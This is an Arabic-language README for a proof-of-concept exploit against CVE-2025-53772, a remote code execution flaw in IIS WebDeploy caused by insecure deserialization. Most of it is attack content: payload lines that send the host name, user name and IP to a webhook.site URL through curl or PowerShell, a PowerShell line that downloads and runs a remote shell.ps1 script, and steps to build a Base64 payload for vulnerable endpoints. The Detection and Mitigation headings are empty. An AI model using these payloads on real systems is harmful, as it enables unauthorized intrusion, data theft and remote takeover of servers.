
استغلال لإثبات المفهوم (PoC) لثغرة CVE-2025-53772، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد في IIS WebDeploy عبر إلغاء تسلسل غير آمن. يتضمن توليد حمولات قابلًا للتخصيص لجمع المعلومات وتنفيذ الأوامر وإنشاء قذائف عكسية.
يحتوي هذا المستودع على استغلال إثبات المفهوم (PoC) لثغرة CVE-2025-53772، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (Remote Code Execution - RCE) في IIS WebDeploy عبر إلغاء التسلسل غير الآمن.
هذه الأداة مخصصة للأغراض التعليمية واختبارات الأمان المصرح بها فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.
قم بتعديل الحمولة في ملف poc.cs في السطرين 18-19 لتحديد الإجراء المستهدف (action): csharp// Replace with your webhook URL and desired payload
set.Add("cmd.exe");
set.Add("/c curl -X POST https://webhook.site/YOUR-WEBHOOK-ID -H \"Content-Type: application/json\" -d \"{\\\"hostname\\\":\\\"%COMPUTERNAME%\\\",\\\"user\\\":\\\"%USERNAME%\\\",\\\"ip\\\":\\\"$(curl -s ifconfig.me)\\\",\\\"exploit\\\":\\\"CVE-2025-53772\\\",\\\"timestamp\\\":\\\"%DATE% %TIME%\\\"}\"");
جمع المعلومات (موصى به):
set.Add("-Command \"$hostname=$env:COMPUTERNAME; $user=$env:USERNAME; $ip=(Invoke-RestMethod -Uri 'https://ipinfo.io/ip' -UseBasicParsing); $body=@{hostname=$hostname;user=$user;ip=$ip;exploit='CVE-2025-53772';timestamp=(Get-Date)} | ConvertTo-Json; Invoke-RestMethod -Uri 'https://webhook.site/YOUR-WEBHOOK-ID' -Method Post -Body $body -ContentType 'application/json'\"");
تنفيذ أمر بسيط:
set.Add("/c calc.exe"); // Opens calculator
صدفة عكسية (متقدمة):
set.Add("-Command \"IEX (New-Object Net.WebClient).DownloadString('http://YOUR-SERVER/shell.ps1')\"");
سيقوم GitHub Action تلقائيًا بتجميع الـ PoC وإنشاء الحمولة المشفرة بنظام Base64:
استخدم الحمولة المُولّدة بنظام Base64 ضد نقطة نهاية IIS WebDeploy المعرضة للخطر:
🎯 تفاصيل الثغرة
البرنامج المتأثر: IIS WebDeploy (إصدارات متعددة) نوع الثغرة: إلغاء تسلسل غير آمن يؤدي إلى RCE متجه الهجوم: عن بُعد، بدون مصادقة الخطورة: حرجة
إذا كنت تفضل التجميع محليًا بدلاً من استخدام GitHub Actions: bash# Windows with .NET Framework C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe poc.cs poc.exe > payload.txt
csc poc.cs poc.exe
الاكتشاف:
التخفيف: